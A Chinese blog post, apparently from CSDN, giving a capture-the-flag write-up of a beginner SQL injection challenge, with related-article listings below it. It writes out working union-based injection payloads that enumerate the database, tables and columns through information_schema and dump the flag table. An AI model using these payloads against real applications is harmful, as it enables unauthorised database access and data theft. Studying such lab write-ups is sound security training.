[第一章 web入门]SQL注入-1

最新推荐文章于 2024-03-14 23:38:12 发布
最新推荐文章于 2024-03-14 23:38:12 发布
阅读量1k 收藏 2
点赞数
文章标签: 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/evil_ming/article/details/124366036
版权

打开靶机

看见url里id=0

直接给他改成=1

那说明存在注入点

尝试id=2

尝试=3

按照提示来add

所以字段数为3,在3处可以显位

用联合查询

?id=-1' union select 1,database(),3 --+

得到数据库名为notes

再查表名

?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

预判在fl4g表里,打开该表

?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'--+

 然后爆数据得到flag

?id=-4' union select 1,database(), group_concat(fllllag) from fl4g --+

 over.

evil_ming
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1148
简单的SQL注入
SQL注入攻击与防御(安全技术经典译丛)
02-19
第1章 什么是SQL注入  1.1 概述  1.2 理解Web应用的工作原理  1.2.1 一种简单的应用架构  1.2.2 一种较复杂的架构  1.3 理解SQL注入  1.4 理解SQL注入的产生过程  1.4.1 构造动态字符串  1.4.2 不...
[第一章 web入门]SQL注入-1 题目分析与详解
2302_79800344的博客
02-25 1044
本题考查SQL注入基础。
[第一章 web入门]SQL注入-1BUUCTF
最新发布
observer的博客
03-14 964
[第一章 web入门]SQL注入-1BUUCTF
Java Web开发实战宝典 第20-24章
07-08
- **SQL注入与防护**:解释SQL注入攻击及如何使用预编译语句防止。 - **session管理**:用户会话的创建、跟踪与失效,以及Session Hijacking和Session Fixation的安全问题。 这些章节为读者构建了一个完整的Java ...
SQL注入攻击与防御
10-04
第1章 什么是SQL注入 1 1.1 概述 2 1.2 理解Web应用的工作原理 2 1.2.1 一种简单的应用架构 3 1.2.2 一种较复杂的架构 4 1.3 理解SQL注入 5 1.4 理解SQL注入的产生过程 10 1.4.1 构造动态字符串 10 1.4.2 不安全的...
ASP.NET数据库入门经典--C#编程篇
09-28
11. 数据库安全性:了解如何设置数据库权限,控制不同用户对数据库的访问级别,以及使用参数化查询防止SQL注入攻击。 通过学习上述知识点,初学者能够掌握使用ASP.NET和C#进行数据库编程的基础,从而能够创建功能...
ASP+SQL Server 2005项目开发从入门到精通.iso第三章
07-06
在本资源中,我们聚焦于...通过深入学习这一章,你将能够熟练地运用ASP.NET和SQL Server 2005进行实际项目的开发,实现高效的数据管理和动态网页交互。同时,对这些技术的掌握也将为你在Web开发领域奠定坚实的基础。
webSQL注入
observer的博客
03-14 1016
[第一章 web入门]SQL注入-1BUUCTF
N1BOOK第三关摸鱼:[第一章 web入门]SQL注入-1
weixin_45571987的博客
11-30 3187
BUUCTF:[第一章 web入门]SQL注入-1寻找注入点尝试注入测试有几个回显开始查库查表查字段flag 寻找注入点   由域名和题目的名字可以知道咱们这道题需要尝试对它进行SQL注入http://554314db-43b4-4f9d-b9bb-b6089db353a1.node3.buuoj.cn/index.php?id=1 ?id=1’ and 1=2 页面出现错误,说明存在注入点 id 尝试注入 测试有几个回显 ?id=1’ order by3 --+ 页面正常 ?id=1’ order
N1Book [第一章 web入门]-sql注入
m0_61368098的博客
08-20 758
重要的数据库:   information_schema   包含MySQL中所有的数据库信息 重要的表:   schemata   mysql中所有数据库的信息   schema_name  所有数据库名   tables   数据库表中的信息   table_schema 记录数据库名    table_name  记录数据表名 columns   列信息 column_name  字段名
 第一章:SQL注入基础--1.1Web应用架构分析&1.2 SQLi注入环境搭建
n0d_xy的博客
04-13 397
简介:文章分为三部分:1、概要;2详细的思维导图;3、详细的解说。 描述:概要包括该文介绍的知识点;详细的思维导图更好地理清思路,方便记忆,但对于有些对于作者比较基础的内容不会有详细的解释,建议主动了解;详细的解说作者会根据思维导图的纲要添加代码语句等内容,有时间会添加具体操作,具体步骤,操作结果等内容,添加需要注意的Tips(蓝色字体怎样)。 Tips:这些都是作者学习过的内容,文字、思维导...
 第一章:SQL注入基础--1.3 SQL注入原理分析
n0d_xy的博客
04-14 450
简介:文章分为三部分:1、概要;2详细的思维导图;3、详细的解说。 描述:概要包括该文介绍的知识点;详细的思维导图更好地理清思路,方便记忆,但对于有些对于作者比较基础的内容不会有详细的解释,建议主动了解;详细的解说作者会根据思维导图的纲要添加代码语句等内容,有时间会添加具体操作,具体步骤,操作结果等内容,添加需要注意的Tips(蓝色字体怎样)。 Tips:这些都是作者学习过的内容,文字、思维导...
[第一章 web入门]SQL注入 三种解法
u011250160的博客
12-15 1261
解法一:联合查询 看到这个id=1莫名的就想试试id=2,3,4 index.php?id=1 index.php?id=2 index.php?id=3 id=4的时候就没了 index.php?id=4 查看下tips 如果有能力的话还是自己猜后台的语句 index.php?id=1&tips=1 判断字段个数 当order by 1,2,3没错 当order by 1,2,3,4没显示了 说明这里就是三个字段 然后寻找回显的位置 之前的文章里我也提到过,联合查询会先显示前面
初学Web安全之sql注入(一)
weixin_47531846的博客
11-17 2409
初学Web安全之sql注入(一) sql注入产生原因 sql注入漏洞的产生需要满足以下两个条件: 参数用户可控 传入的参数拼接到sql语句并且带入到数据库查询 一般来说,用户登录网页所使用的sql语句为: select * from user where username='admin' and password='password'; 而如果程序员设计网页之初没有对用户的输入进行过滤,使得用户的输入可以带入到数据库,那么这时候就可以产生sql注入,最简单的一种,就是构造万能密码,这里拿dvwa来
[第一章 web入门]sql注入-1
06-28
SQL注入是一种常见的攻击方式,攻击者通过在Web应用程序中注入恶意的SQL语句,从而获取敏感信息或者执行非法操作。SQL注入攻击的原理是利用Web应用程序没有对用户输入的数据进行充分的过滤和验证,从而导致恶意SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值